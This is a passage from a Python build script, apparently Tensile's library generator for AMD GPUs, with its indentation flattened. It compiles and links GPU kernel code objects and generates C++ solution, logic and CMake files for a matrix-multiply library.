for k in assemblyKernels:
archs[tuple(k['ISA'])].append(k)
coFiles = []
for arch, archKernels in archs.items():
objectFiles = list([kernelWriterAssembly.getKernelName(k) + '.o' \
for k in archKernels \
if k['KernelLanguage'] == 'Assembly'])
if len(objectFiles) == 0:
continue
archName = 'gfx'+''.join(map(str,arch))
coFile = os.path.join(destDir, 'TensileLibrary_{}.co'.format(archName))
args = kernelWriterAssembly.getLinkCodeObjectArgs(objectFiles, coFile)
subprocess.check_call(args, cwd=asmDir)
coFiles.append(coFile)
return coFiles
else:
assemblyKernelNames = [kernelWriterAssembly.getKernelName(k) for k in assemblyKernels]
origCOFiles = [os.path.join(asmDir, k + '.co') for k in assemblyKernelNames]
newCOFiles = [os.path.join(destDir, k + '.co') for k in assemblyKernelNames]
for src, dst in Utils.tqdm(zip(origCOFiles, newCOFiles), "Copying code objects"):
shutil.copyfile(src, dst)
return newCOFiles
def which(p):
exes = [p+x for x in ['', '.exe', '.bat']]
system_path = os.environ['PATH'].split(os.pathsep)
for dirname in system_path+['/opt/rocm/bin']:
for exe in exes:
candidate = os.path.join(os.path.expanduser(dirname), exe)
if os.path.isfile(candidate):
return candidate
return None
def buildSourceCodeObjectFile(CxxCompiler, outputPath, kernelFile):
buildPath = ensurePath(os.path.join(globalParameters['WorkingPath'], 'code_object_tmp'))
destDir = ensurePath(os.path.join(outputPath, 'library'))
(_, filename) = os.path.split(kernelFile)
(base, _) = os.path.splitext(filename)
objectFilename = base + '.o'
objectFilepath = os.path.join(buildPath, objectFilename)
soFilename = base + '.so'
soFilepath = os.path.join(buildPath, soFilename)
archs = ['gfx'+''.join(map(str,arch)) for arch in globalParameters['SupportedISA'] \
if globalParameters["AsmCaps"][arch]["SupportedISA"]]
archFlags = ['--amdgpu-target=' + arch for arch in archs]
if (CxxCompiler == 'hcc'):
hipFlags = subprocess.check_output([which('hcc-config'), '--cxxflags']).decode().split(' ')
# when HCC_HOME is defined -I/opt/rocm/include is *not* part of
# hcc-config --cxxflags; so we need hipconfig -C to be safe
hipFlags += subprocess.check_output([which('hipconfig'), '-C']).decode().split(' ')
hipLinkFlags = subprocess.check_output([which('hcc-config'), '--ldflags', '--shared']).decode().split(' ')
hipFlags += ['-I', outputPath, '-fPIC']
compileArgs = [which('hcc')] + hipFlags + [kernelFile, '-c', '-o', objectFilepath]
linkArgs = [globalParameters['AssemblerPath']] + hipLinkFlags + archFlags + [objectFilepath, '-shared', '-o', soFilepath]
extractArgs = [globalParameters['ExtractKernelPath'], '-i', soFilename]
#print(' '.join(compileArgs))
subprocess.check_call(compileArgs)
#print(' '.join(linkArgs))
subprocess.check_call(linkArgs)
#print(' '.join(extractArgs))
subprocess.check_call(extractArgs, cwd=buildPath)
coFilenames = ["{0}-000-{1}.hsaco".format(soFilename, arch) for arch in archs]
elif (CxxCompiler == "hipcc"):
hipFlags = ["--genco", "-D__HIP_HCC_COMPAT_MODE__=1"]
hipFlags += ['-I', outputPath]
compileArgs = [which('hipcc')] + hipFlags + archFlags + [kernelFile, '-c', '-o', soFilepath]
#print(' '.join(compileArgs))
subprocess.check_call(compileArgs)
coFilenames = [soFilename]
else:
raise RuntimeError("Unknown compiler {}".format(CxxCompiler))
extractedCOs = [os.path.join(buildPath, name) for name in coFilenames]
destCOs = [os.path.join(destDir, name) for name in coFilenames]
for (src, dst) in zip(extractedCOs, destCOs):
shutil.copyfile(src, dst)
return destCOs
def buildSourceCodeObjectFiles(CxxCompiler, kernelFiles, outputPath):
args = zip(itertools.repeat(CxxCompiler), itertools.repeat(outputPath), kernelFiles)
coFiles = Common.ParallelMap(buildSourceCodeObjectFile, args, "Compiling source kernels",
method=lambda x: x.starmap)
return itertools.chain.from_iterable(coFiles)
################################################################################
def prepAsm():
"""
Create and prepare the assembly directory - called ONCE per output dir:
"""
asmPath = ensurePath(os.path.join(globalParameters["WorkingPath"], "assembly") )
assemblerFileName = os.path.join(asmPath, \
"asm.%s"%("bat" if os.name=="nt" else "sh"))
assemblerFile = open(assemblerFileName, "w")
if os.name == "nt":
assemblerFile.write("echo Windows: Copying instead of Assembling\n")
assemblerFile.write("copy %1.s %1.o\n")
assemblerFile.write("copy %1.o %1.co\n")
else:
assemblerFile.write("#!/bin/sh %s\n" % ("-x" if globalParameters["PrintLevel"] >=2 else ""))
assemblerFile.write("# usage: asm.sh kernelName ASM_ARGS\n")
assemblerFile.write("# example: asm.sh kernelName -mcpu=gfx900\n")
assemblerFile.write("f=$1\n")
assemblerFile.write("shift\n")
assemblerFile.write("ASM=%s\n"%globalParameters["AssemblerPath"])
# cannot use globalParameters["CurrentISA"] because it might be (0,0,0)
defaultIsa = (9,0,0)
assemblerFile.write( \
"${ASM} -x assembler -target amdgcn-amd-amdhsa %s $@ -c -o $f.o $f.s\n" % \
("-mno-code-object-v3" if \
globalParameters["AsmCaps"][defaultIsa]["HasCodeObjectV3"] and \
globalParameters["CodeObjectVersion"] == "V2" else "-mcode-object-v3"))
assemblerFile.write("${ASM} -target amdgcn-amd-amdhsa $f.o -o $f.co\n")
assemblerFile.close()
os.chmod(assemblerFileName, 0o777)
################################################################################
def buildKernelSourceAndHeaderFiles(results, outputPath, kernelsWithBuildErrs, \
kernelSourceFile, kernelHeaderFile):
"""
Logs errors and writes appropriate info to kernelSourceFile and kernelHeaderFile.
Arguments:
results: list of (err, src, header, kernelName)
outputPath: path to source directory
kernelsWithBuildErrs: Dictionary to be updated with kernels that have errors
kernelSourceFile: File to write source data to
kernelHeaderFile: File to write header data to
"""
sourceFilenames = []
for (err,src,header,kernelName) in results:
if err:
kernelsWithBuildErrs[kernelName] = err
#print "*** warning: invalid kernel#%s"%kernelName
# write kernel.cpp
if not globalParameters["MergeFiles"]:
filename = os.path.join(outputPath, "Kernels", kernelName+".cpp")
sourceFilenames.append(filename)
kernelSourceFile = open(filename, "w")
kernelSourceFile.write(CHeader)
kernelSourceFile.write(src)
if not globalParameters["MergeFiles"]:
kernelSourceFile.close()
# write kernel.h
kernelHeaderFile = open(os.path.join(outputPath, "Kernels", kernelName+".h"), "w")
kernelHeaderFile.write(CHeader)
kernelHeaderFile.write(header)
if not globalParameters["MergeFiles"]:
kernelHeaderFile.close()
return sourceFilenames
################################################################################
# Write Solutions and Kernels for BenchmarkClient or LibraryClient
################################################################################
def writeSolutionsAndKernels(outputPath, CxxCompiler, problemTypes, solutions, kernels, kernelsBetaOnly, \
solutionWriter, kernelWriterSource, kernelWriterAssembly, errorTolerant=False):
start = time.time()
codeObjectFiles = []
print1("# Writing Kernels...")
if not globalParameters["MergeFiles"]:
ensurePath(os.path.join(outputPath, "Solutions"))
ensurePath(os.path.join(outputPath, "Kernels"))
##############################################################################
# Write Kernels
##############################################################################
kernelFiles = []
if globalParameters["MergeFiles"]:
kernelSourceFilename = os.path.join(outputPath, "Kernels.cpp")
kernelHeaderFilename = os.path.join(outputPath, "Kernels.h")
kernelFiles.append(kernelSourceFilename)
kernelSourceFile = open(kernelSourceFilename, "w")
kernelHeaderFile = open(kernelHeaderFilename, "w")
kernelSourceFile.write(CHeader)
kernelHeaderFile.write(CHeader)
kernelSourceFile.write("#include \"Kernels.h\"\n")
kernelHeaderFile.write("#pragma once\n")
if globalParameters["RuntimeLanguage"] == "HIP":
kernelHeaderFile.write("#include <hip/hip_runtime.h>\n")
kernelHeaderFile.write("#include <hip/hip_hcc.h>\n\n")
kernelHeaderFile.write("#include \"KernelHeader.h\"\n\n")
else:
kernelSourceFile = None
kernelHeaderFile = None
kernelsWithBuildErrs = {}
prepAsm()
kIter = zip(kernels, itertools.repeat(kernelWriterSource), itertools.repeat(kernelWriterAssembly))
results = Common.ParallelMap(processKernelSource, kIter, "Generating kernels", method=lambda x: x.starmap)
print(len(results))
removeKernels = []
removeSolutions = []
removeResults = []
for kernIdx in range(0, len(results)):
(err,src,header,kernelName) = results[kernIdx]
if(err == -2):
removeKernels.append(kernels[kernIdx])
removeSolutions.append(solutions[kernIdx])
removeResults.append(results[kernIdx])
for kern in removeKernels:
kernels.remove(kern)
for solut in removeSolutions:
solutions.remove(solut)
for rel in removeResults:
results.remove(rel)
kernelFiles += buildKernelSourceAndHeaderFiles(results, outputPath, kernelsWithBuildErrs, kernelSourceFile, kernelHeaderFile)
kernelsToBuild = list(kernels)
if errorTolerant:
def success(kernel):
writer = kernelWriterAssembly if kernel['KernelLanguage'] == 'Assembly' else kernelWriterSource
kernelName = writer.getKernelName(kernel)
return kernelName not in kernelsWithBuildErrs
kernelsToBuild = list(filter(success, kernelsToBuild))
if False:#len(kernelsWithBuildErrs) > 0:
print("\nKernel compilation failed in one or more subprocesses. May want to set CpuThreads=0 and re-run to make debug easier")
printExit("** kernel compilation failure **")
# beta-only kernels
for kernel in kernelsBetaOnly:
kernelWriter = kernelWriterSource
kernelName = kernelWriter.getKernelNameBetaOnly(kernel)
# write kernel.cpp
if not globalParameters["MergeFiles"]:
kernelSourceFilename = os.path.join(outputPath, "Kernels", kernelName+".cpp")
kernelSourceFile = open(kernelSourceFilename, "w")
kernelSourceFile.write(CHeader)
kernelFiles.append(kernelSourceFilename)
(err, src) = kernelWriter.getSourceFileStringBetaOnly(kernel)
kernelSourceFile.write(src)
if err:
print("*** warning: invalid kernel#%u"%kernelName)
if not globalParameters["MergeFiles"]:
kernelSourceFile.close()
# write kernel.h
if not globalParameters["MergeFiles"]:
kernelHeaderFile = open(os.path.join(outputPath, "Kernels", kernelName + ".h"), "w")
kernelHeaderFile.write(CHeader)
kernelHeaderFile.write( kernelWriter.getHeaderFileStringBetaOnly(kernel))
if not globalParameters["MergeFiles"]:
kernelHeaderFile.close()
# close merged
if globalParameters["MergeFiles"]:
kernelSourceFile.close()
kernelHeaderFile.close()
kernelsToBuild += kernelsBetaOnly
codeObjectFiles += buildSourceCodeObjectFiles(CxxCompiler, kernelFiles, outputPath)
codeObjectFiles += getAssemblyCodeObjectFiles(kernelsToBuild, kernelWriterAssembly, outputPath)
stop = time.time()
print("# Kernel Building elapsed time = %.1f secs" % (stop-start))
print1("# Writing Solutions")
if globalParameters["ShowProgressBar"]:
progressBar = ProgressBar(len(solutions))
##############################################################################
# Write Solutions
##############################################################################
solutionSourceFilename = os.path.join(outputPath, "Solutions.cpp")
solutionHeaderFilename = os.path.join(outputPath, "Solutions.h")
solutionSourceFile = open(solutionSourceFilename, "w")
solutionHeaderFile = open(solutionHeaderFilename, "w")
solutionSourceFile.write(CHeader)
solutionHeaderFile.write(CHeader)
solutionSourceFile.write("#include \"Solutions.h\"\n")
solutionSourceFile.write("#include <algorithm>\n")
solutionHeaderFile.write("#include \"TensileTypes.h\"\n")
solutionHeaderFile.write("#include \"SolutionHelper.h\"\n")
solutionHeaderFile.write("#include \"Tools.h\"\n")
if globalParameters["CodeFromFiles"]:
solutionHeaderFile.write("#include <unistd.h>\n")
if globalParameters["MergeFiles"]:
solutionHeaderFile.write("#include \"Kernels.h\"\n")
# Write a solution pointer typedef for each problemType:
h = ""
for problemType in problemTypes:
#print "p=", problemType
argListAll = solutionWriter.getArgList(problemType, True, True, True, True)
# declare TensileSolutionPointer_ProblemType
h += "\n// solution pointer\n"
h += "typedef TensileStatus (*TensileSolutionPointer_%s)(\n" % problemType
for i in range(0, len(argListAll)):
h += " %s %s%s" % (argListAll[i][0], argListAll[i][1], ",\n" \
if i < len(argListAll)-1 else ");\n\n")
h += "\n"
solutionHeaderFile.write(h)
#
for solution in solutions:
# get solution name
if not globalParameters["MergeFiles"]:
solutionFileName = solutionWriter.getSolutionName(solution)
# write solution.cpp
if not globalParameters["MergeFiles"]:
solutionSourceFile = open(os.path.join(outputPath, \
"Solutions", solutionFileName+".cpp"), "w")
solutionSourceFile.write(CHeader)
solutionSourceFile.write( \
solutionWriter.getProblemSourceString(solution["ProblemType"], solution, kernelsWithBuildErrs))
if not globalParameters["MergeFiles"]:
solutionSourceFile.close()
# write solution.h
if not globalParameters["MergeFiles"]:
solutionHeaderFile = open(os.path.join(outputPath, \
"Solutions", solutionFileName+".h"), "w")
solutionHeaderFile.write(CHeader)
solutionHeaderFile.write( \
solutionWriter.getHeaderFileString(solution))
if not globalParameters["MergeFiles"]:
solutionHeaderFile.close()
if globalParameters["ShowProgressBar"]:
progressBar.increment()
# close merged
if not globalParameters["MergeFiles"]:
solutionHeaderFile.close()
if globalParameters["ExitAfterKernelGen"]:
printExit("** Exiting after kernel generation due to ExitAfterKernelGen=1")
return codeObjectFiles
################################################################################
# Write Logic
################################################################################
def writeLogic(outputPath, logicData, solutionWriter ):
print1("# Writing Library Logic")
if not globalParameters["MergeFiles"]:
ensurePath(os.path.join(outputPath, "Logic"))
# Tensile.h
h = ""
h += "#pragma once\n"
h += "#include \"TensileTypes.h\"\n"
h += "#include \"SolutionHelper.h\"\n"
h += "#include \"SolutionMapper.h\"\n"
# TensileInternal.h
ih = ""
ih += "#include \"Tensile.h\"\n"
# Tensile.cpp
sourceIncludes = ""
sourceIncludes += "#include \"Solutions.h\"\n"
sourceIncludes += "#include \"Tensile.h\"\n"
sourceIncludes += "#include \"TensileInternal.h\"\n"
sourceIncludes += "#include \"SolutionMapper.h\"\n"
s = sourceIncludes
########################################
# problemType
for problemType in logicData:
# function argument list
argListSizes = solutionWriter.getArgList(problemType, False, False, False, False)
argListData = solutionWriter.getArgList(problemType, False, True, True, True)
argListAll = solutionWriter.getArgList(problemType, True, True, True, True)
# tensile initializer
h += "\nvoid tensileInitialize();\n\n"
# declare tensile_ProblemType
h += "\n// enqueue solution\n"
h += "TensileStatus tensile_%s(\n" % problemType
for i in range(0, len(argListData)):
h += " %s %s%s" \
% (argListData[i][0], argListData[i][1], \
",\n" if i < len(argListData)-1 else ");\n\n")
numSizes = problemType["TotalIndices"];
firstStride = 0 if problemType["UseInitialStrides"] else 1
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
lastStrideC = problemType["NumIndicesC"]
lastStrideD = problemType["NumIndicesC"]
h += "typedef ProblemKey<%u> ProblemKey_%s;\n" % (numSizes,problemType)
h += "typedef ProblemDims<%u,%u,%u,%u,%u,%u> ProblemDims_%s;\n" \
% (firstStride, lastStrideD, lastStrideC, lastStrideA, lastStrideB, numSizes, problemType)
h += "typedef SolutionMapper<ProblemDims_%s, ProblemKey_%s> SolutionMapper_%s;\n" \
% (problemType, problemType, problemType)
# declare tensileGetSolutionPointer_ProblemType
h += "\n// get solution pointer\n"
h += "SolutionMapper_%s::SolutionRuntime *\n" % (problemType)
h += "tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
h += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ");\n\n")
# declare tensileName_
h += "// get solution name\n"
h += "const char * tensileGetSolutionName_%s(\n" \
% (problemType)
for i in range(0, len(argListSizes)):
h += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ");\n\n")
# get solution naming for problem type
solutionsForProblemType = []
for scheduleTuple in logicData[problemType]:
solutionsForSchedule = scheduleTuple[2]
for solution in solutionsForSchedule:
if solution not in solutionsForProblemType:
solutionsForProblemType.append(solution)
# solution names for problem type
solutionNamesForProblemType = []
for solution in solutionsForProblemType:
solutionName = solutionWriter.getSolutionName(solution)
solutionNamesForProblemType.append(solutionName)
# reset problemType source
if not globalParameters["MergeFiles"]:
filePrefix = "Tensile_%s" % (problemType)
s = sourceIncludes
for solutionName in solutionNamesForProblemType:
s += "#include \"%s.h\"\n" % solutionName
########################################
# Per-problem constants here:
# These are common for all schedules and thus do not include schedule name (vega,hip,etc)
s += "\n"
s += "/*******************************************************************************\n"
s += "* Per-Problem Functions for %s\n" % problemType
s += "*******************************************************************************/\n"
s += "// Problem type include the index assignments for free, summation, batch:\n"
s += "static const ProblemType problemType_%s( " % problemType
s += listToInitializer(problemType["IndicesFree"]) + ", "
s += listToInitializer(problemType["IndicesSummation"]) + ", "
s += listToInitializer(problemType["IndicesBatch"]) + ", "
s += listToInitializer(problemType["IndexAssignmentsA"]) + ", "
s += listToInitializer(problemType["IndexAssignmentsB"])
s += ");\n"
s += "\n"
s += "// Master solution mapper is the entry point for problem->solution mapping\n"
s += "// There is one master solution mapper per problem type\n"
s += "// The master solution mapper contains pointers to the solution mappers for each device\n"
s += "static MasterSolutionMapper<ProblemDims_%s> masterSolutionMapper_%s;\n " % (problemType,problemType)
########################################
# implement per-Schedule functions in source
s += "\n"
s += "/*******************************************************************************\n * Per-Schedule Functions\n *******************************************************************************/"
for scheduleTuple in logicData[problemType]:
# get logic parameters for problem type
scheduleName = scheduleTuple[0]
deviceNames = scheduleTuple[1]
solutionsForSchedule = scheduleTuple[2]
indexOrder = scheduleTuple[3]
exactLogic = scheduleTuple[4]
rangeLogic = scheduleTuple[5]
# solution names for schedule
solutionNamesForSchedule = []
for solution in solutionsForSchedule:
solutionName = solutionWriter.getSolutionName(solution)
solutionNamesForSchedule.append(solutionName)
s += "\n\n"
schedProbName = "%s_%s" % (scheduleName, problemType)
s += writeSolutionAndExactTable(scheduleName, deviceNames, schedProbName, problemType, \
solutionsForSchedule, solutionNamesForSchedule, exactLogic)
# Per-problem function here:
# function tensileGetSolutionPointer_ProblemType
del schedProbName
del scheduleName
s += "\n// problem dims -> solution logic\n"
s += "SolutionMapper_%s::SolutionRuntime *\n" % (problemType)
s += "tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
s += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ") {\n\n")
exactLogicStr = writeExactLogic(problemType, indexOrder, \
solutionsForSchedule, exactLogic, \
solutionNamesForSchedule, True)
if rangeLogic != None:
print("** warning: ignored ranges in logic file, these should have been expanded with ExpandRanges=1 during Tensile phase 3")
s += " /* exact mappings */\n"
s += exactLogicStr
s += "\n return nullptr;\n"
s += "\n}\n"
# function tensileGetSolutionName_Schedule_ProblemType
s += "\n// get solution name for problem dims\n"
s += "const char * tensileGetSolutionName_%s(\n" \
% (problemType)
for i in range(0, len(argListSizes)):
s += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ") {\n\n")
exactLogicStr = writeExactLogic(problemType, indexOrder, \
solutionsForSchedule, exactLogic, \
solutionNamesForSchedule, False)
s += " /* exact mappings */\n"
s += exactLogicStr
#s += " return NULL; // none\n"
s += "\n}\n"
########################################
# implement problem-type functions in source
s += "/*******************************************************************************\n * Per-ProblemType Functions\n *******************************************************************************/"
# declare tensile_ProblemType
s += "\n// main call to solution; enqueues a kernel\n"
s += "TensileStatus tensile_%s(\n" % problemType
for i in range(0, len(argListData)):
s += " %s %s%s" \
% (argListData[i][0], argListData[i][1], \
",\n" if i < len(argListData)-1 else ") {\n")
s += " auto solution = tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
s += " %s%s" \
% (argListSizes[i][1], ", " if i < len(argListSizes)-1 else ");")
s += "\n"
s += " if (solution) {\n"
s += " TensileSolutionPointer_%s f = reinterpret_cast<TensileSolutionPointer_%s> (solution->_info->_functionPtr);\n" \
% (problemType, problemType)
s += " auto solutionLock = &solution->_lock;\n"
s += " return f("
for i in range(0, len(argListAll)):
s += "%s%s" \
% (argListAll[i][1], ", " if i < len(argListAll)-1 else ");\n")
s += " } else {\n"
#s += " printf(\"solution not valid, returning fail\\n\");"
s += " return tensileStatusFailure; // no solution found\n"
s += " }\n"
s += "}\n"
# open and close problemType files
if not globalParameters["MergeFiles"]:
logicSourceFile = open(os.path.join(outputPath, "Logic", \
"%s.cpp" % filePrefix), "w")
logicSourceFile.write(s)
logicSourceFile.close()
s += "\n"
s += writeTensileInitialize(logicData)
# close merged files
if globalParameters["MergeFiles"]:
logicSourceFile = open(os.path.join(outputPath, \
"Tensile.cpp"), "w")
logicSourceFile.write(s)
logicSourceFile.close()
logicHeaderFile = open(os.path.join(outputPath, \
"Tensile.h"), "w")
logicHeaderFile.write(h)
logicHeaderFile.close()
internalHeaderFile = open(os.path.join(outputPath, \
"TensileInternal.h"), "w")
internalHeaderFile.write(ih)
internalHeaderFile.close()
def writeTensileInitialize(logicData):
s = "/*******************************************************************************\n"
s += "* Tensilze initializer\n"
s += "*******************************************************************************/\n"
s += "void tensileInitialize() {\n"
for problemType in logicData:
s += " masterSolutionMapper_%s.initialize();\n" % problemType
for scheduleTuple in logicData[problemType]:
scheduleName = scheduleTuple[0]
deviceNames = scheduleTuple[1]
schedProbName = "%s_%s" % (scheduleName, problemType)
s += " solutionMapper_%s.initializeMappers(" % (schedProbName)
s += "{%s}," % (', '.join('"{0}"'.format(w) for w in deviceNames))
s += "&masterSolutionMapper_%s);\n" % (problemType)
s += "}"
return s
def writeSolutionAndExactTable(scheduleName, deviceNames, schedProbName, problemType, \
solutionsForSchedule, solutionNames, exactLogic):
s = ""
s += "namespace { // Start schedule '%s'\n" % scheduleName
s += "// solution table - function, name, assertion requirements\n"
s += "static const SolutionInfo solutionTable_%s[] = {\n" % (schedProbName)
for i in range(0, len(solutionsForSchedule)):
solution = solutionsForSchedule[i]
solutionName = solutionNames[i]
s += " {(void*)%s, \"%s\", {%d, %d, %d, %d, %d, %d, %d} }%s // %d" % \
(solutionName, solutionName, \
solution["AssertSummationElementMultiple"], \
solution["AssertFree0ElementMultiple"], \
solution["AssertFree1ElementMultiple"], \
solution["AssertMinApproxSize"], \
solution["LdcEqualsLdd"], \
solution["PackBatchDims"]==2, \
solution["PackBatchDims"]==1, \
"," if i < len(solutionsForSchedule)-1 else "", \
i)
s += "\n"
s += "};\n\n"
# Write the exact problems here
s += "// table of exact problem dims and selected solutionIdx\n"
s += "static const std::pair<const ProblemKey_%s, int> embeddedExactTable_%s[] = {\n" % (problemType,schedProbName)
numSizes = problemType["TotalIndices"]
for ruleIdx in range(0, len(exactLogic)):
rule = exactLogic[ruleIdx]
problemSize = rule[0][:numSizes]
solutionIdx = rule[1][0]
solutionGFlops = rule[1][1]
s += " { {"
for i in range(0, len(problemSize)):
if i == 0:
s += "%u" % problemSize[i];
else:
s += ", %u" % problemSize[i];
s += "}, %u}" % (solutionIdx)
s += "," if ruleIdx != len(exactLogic)-1 else " "
s += " // %.0f GFlop/s" % (solutionGFlops)
s += "\n";
s += "};\n\n"
# Create a solution mapper and init with the table above:
s += "// The solution master constructor here adds device to the master solution mapper\n"
s += "// The entrypoint to find a solution for this problem is through the master solution master\n"
s += "static SolutionMapper_%s solutionMapper_%s(\n" % (problemType, schedProbName)
s += " \"%s\", // schedule+problem name\n" % (schedProbName)
s += " solutionTable_%s, %u,\n" % (schedProbName, len(solutionsForSchedule))
s += " embeddedExactTable_%s, %u,\n" % (schedProbName, len(exactLogic))
s += " &problemType_%s);\n" % (problemType)
s += "} // end anonymous namespace\n"
return s
################################################################################
# Write Range Logic Recursive
# ptr :
# True : write logic to return the function pointer
# False : write logic to return the function name
################################################################################
def writeExactLogic(problemType, indexOrder,
solutionsForSchedule, exactLogic, \
solutionNames, ptr):
s = ""
s += " ProblemDims_%s pdims(" % problemType
indexChars = globalParameters["IndexChars"]
firstStride = 0 if problemType["UseInitialStrides"] else 1
lastStrideD = problemType["NumIndicesC"]
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
for i in range(firstStride,lastStrideD):
if i != firstStride: s += ", "
s += "strideD%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideC):
s += ", strideC%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
s += ", strideA%u%s" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
s += ", strideB%u%s" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0,len(indexOrder)):
s += ", size%s" % indexChars[i]
s += ");\n"
s += " auto solutionMapper = reinterpret_cast<SolutionMapper_%s *> (masterSolutionMapper_%s.mapper());\n" \
% (problemType, problemType)
if ptr:
s += " return solutionMapper->getSolutionWithFallback(pdims,&masterSolutionMapper_%s);\n" % problemType
else:
s += " return solutionMapper->getSolutionWithFallback(pdims,&masterSolutionMapper_%s)->_info->_name;\n" % problemType
return s
################################################################################
# Write Solution Call
################################################################################
def writeSolutionCall(solutionName, problemType):
indexChars = globalParameters["IndexChars"]
s = ""
s += "%s(" % solutionName
# solution parameters
s += " dataD, dataC, dataA, dataB, alpha"
if problemType["UseBeta"]:
s += ", beta"
s += ", offsetC, offsetA, offsetB"
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideD = problemType["NumIndicesC"]
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
for i in range(firstStride,lastStrideD):
s += ", strideD%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideC):
s += ", strideC%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
s += ", strideA%u%s" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
s += ", strideB%u%s" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
s += ", size%s" % indexChars[i]
s += ", stream, numInputEvents, inputEvents, outputEvent )"
return s
################################################################################
# Write CMake
################################################################################
def writeCMake(outputPath, solutions, kernels, libraryStaticFiles, clientName ):
print1("# Writing Custom CMake")
##############################################################################
# Min Naming
##############################################################################
if globalParameters["ShortNames"] and not globalParameters["MergeFiles"] :
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
else:
solutionSerialNaming = None
kernelSerialNaming = None
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
kernelWriterSource = KernelWriterSource( \
kernelMinNaming, kernelSerialNaming)
kernelWriterAssembly = KernelWriterAssembly( \
kernelMinNaming, kernelSerialNaming)
generatedFile = open(os.path.join(outputPath, "Generated.cmake"), "w")
generatedFile.write(CMakeHeader)
generatedFile.write("set( TensileClient_SOLUTIONS\n")
# write solution names
if globalParameters["MergeFiles"]:
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions.h\n")
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions.cpp\n")
else:
for solution in solutions:
solutionName = solutionWriter.getSolutionName(solution)
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions/%s.h\n" \
% (solutionName) )
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions/%s.cpp\n" \
% (solutionName) )
generatedFile.write(" )\n")
# write kernel names
generatedFile.write("set( TensileClient_KERNELS\n")
if globalParameters["MergeFiles"]:
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels.h\n")
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels.cpp\n")
else:
for kernel in kernels:
kernelName = kernelWriterSource.getKernelName(kernel) if kernel["KernelLanguage"] == "Source" else kernelWriterAssembly.getKernelName(kernel)
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels/%s.h\n" % (kernelName))
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels/%s.cpp\n" % kernelName)
generatedFile.write(" )\n")
generatedFile.write("set( TensileClient_SOURCE\n")
for fileName in libraryStaticFiles:
# copy file
shutil.copy( os.path.join(globalParameters["SourcePath"], fileName), \
outputPath )
# add file to cmake
generatedFile.write(" ${CMAKE_SOURCE_DIR}/%s\n" % fileName)
generatedFile.write(" )\n\n")
# close generated cmake
generatedFile.close()
################################################################################
# Tensile Create Library
################################################################################
def TensileCreateLibrary():
print1("")
print1(HR)
print1("# Tensile Create Library")
print2(HR)
print2("")
##############################################################################
# Parse Command Line Arguments
##############################################################################
print2("Arguments: %s" % sys.argv)
argParser = argparse.ArgumentParser()
argParser.add_argument("LogicPath", help="Path to LibraryLogic.yaml files.")
argParser.add_argument("OutputPath", help="Where to write library files?")
argParser.add_argument("RuntimeLanguage", help="Which runtime language?", choices=["OCL", "HIP", "HSA"])
argParser.add_argument("--cxx-compiler", dest="CxxCompiler", choices=["hcc", "hipcc"], action="store", default="hcc")
argParser.add_argument("--code-object-version", dest="CodeObjectVersion", choices=["V2", "V3"], action="store", default="V2")
argParser.add_argument("--merge-files", dest="MergeFiles", action="store_true")
argParser.add_argument("--no-merge-files", dest="MergeFiles", action="store_false")
argParser.add_argument("--short-file-names", dest="ShortNames", action="store_true")
argParser.add_argument("--no-short-file-names", dest="ShortNames", action="store_false")
argParser.add_argument("--library-print-debug", dest="LibraryPrintDebug", action="store_true")
argParser.add_argument("--no-library-print-debug", dest="LibraryPrintDebug", action="store_false")
argParser.add_argument("--embed-library", dest="EmbedLibrary",
help="Embed (new) library files into static variables. Specify the name of the library.")
argParser.add_argument("--embed-library-key", dest="EmbedLibraryKey", default=None,
help="Access key for embedding library files.")
args = argParser.parse_args()
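  # Example invocation (paths are placeholders; the flags correspond to the arguments
  # defined above). This is an illustrative sketch, not part of the original script:
  #   python TensileCreateLibrary.py /path/to/LibraryLogic ./tensile_out HIP \
  #       --cxx-compiler hipcc --merge-files --short-file-names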
logicPath = args.LogicPath
outputPath = args.OutputPath
CxxCompiler = args.CxxCompiler
print2("OutputPath: %s" % outputPath)
ensurePath(outputPath)
arguments = {}
arguments["RuntimeLanguage"] = args.RuntimeLanguage
arguments["CodeObjectVersion"] = args.CodeObjectVersion
arguments["CxxCompiler"] = args.CxxCompiler
arguments["MergeFiles"] = args.MergeFiles
